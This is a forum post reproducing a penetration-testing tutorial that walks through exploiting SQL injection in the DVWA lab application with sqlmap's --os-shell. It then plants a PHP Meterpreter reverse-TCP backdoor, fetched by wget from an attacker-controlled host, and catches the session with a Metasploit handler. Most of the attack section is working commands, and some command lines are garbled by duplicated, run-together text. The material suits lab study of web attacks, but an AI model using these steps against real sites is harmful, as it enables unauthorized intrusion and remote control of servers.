• We just launched and are currently in beta. Join us as we build and grow the community.

Take Meterpreter of Website using Sqlmap ( OS-Shell )

Scripted

Zero Trust Tester
S
S Rep
0
0
0
Rep
0
S Vouches
0
0
0
Vouches
0
Posts
124
Likes
11
Bits
0
1 MONTH
1 1 MONTH OF SERVICE
LEVEL 1 500 XP
Charcoal-and-Gold-Modern-Photography-Education-Presentation-1.png


Hey Folks, in this tutorial we will discuss about another topic related to sqlmap tool. If you have not read our previous article related to sqlmap then you must read it, because all your doubts related to database hacking will go away after reading those articles. We are assuming that you are familiar with the sqlmap tool and their features as well as the basics of SQL injection vulnerability. Now in this tutorial we will be able to access the web server due to SQL injection vulnerability in web application with the help of “os-shell” feature of sqlmap tool.

Lets take a look 🙂 !!

DVWA

We’ll use the DVWA vulnerable web application to demonstrate this feature of the sqlmap tool. But if you have not configured this web application then you can configure it by going here. When we enter a numeric string after it enters the SQL injection section, we get information about users on the web application, which seems like that the web application is vulnerable to the vulnerability of SQL injection.

1-14.png


We will use the HTTP request to dump the database due to which we use the burpsuite tool to retrieve the HTTP request. Just copy the entire request.

2-18.png


Now we will create a file in which we will paste the entire copied HTTP request on it.

3-15.png

OS Shell

Originally this feature is provided to obtain the web application’s operating system shell (web server). Just we need to add “–os-shell” option after the HTTP request file and execute the command.

sqlmap -r secnhack --os-shell1sqlmap-rsecnhack--os-shell

4-14.png


Here we have to type 1 to create php backdoor for the remote server and then type 1 to identify the writable file location on the web server.

5-13.png


Amazing 🙂 !! It will try multiple combinations of directories via brute force techniques to identify writable permissions. As you can see we are able to access web server files.

6-12.png

OS-shell to Meterpreter

Now we will create php backdoor through MSFPC tool, but in your case you can create it according to any tool. After the payload is created, we rename the file and start the python service to download the payload via the wget tool.

msfpc PHP 4444
mv /root/php-meterpreter-staged-reverse-tcp-4444.php secnhack.php
python -m SimpleHTTPSevrer123msfpc PHP4444mv/root/php-meterpreter-staged-reverse-tcp-4444.phpsecnhack.phppython-mSimpleHTTPSevrer

7-13.png


Now we will return to the web server’s cmd shell and upload our PHP backdoor via the wget command.

wget -N 192.168.1.17:8000/secnhack.php1wget-N192.168.1.17:8000/secnhack.php

8-12.png


As you can see, our php backdoor is uploaded at the following location of the web server.

9-13.png


Now we will copy the entire location searched by “pwd” command and paste it on the browser with php backdoor. Let’s execute it.

Loading…

192.168.1.13

Loading…

192.168.1.13

10-11.png


Boom 🙂 !! The wait is over as soon as we execute the location of the php backddor on the browser, we get the meterpreter session of the web server.

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.17
set lport 4444
run12345useexploit/multi/handlerset payload php/meterpreter/reverse_tcpset lhost192.168.1.17set lport4444run

11-11.png


Likewise, we can use different kinds of payload and methods to get meterpreter session of the web server.

About the AuthorShubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.
 
You must log in or register to reply here.

414,034

309,575

309,584

M Maikel787
Top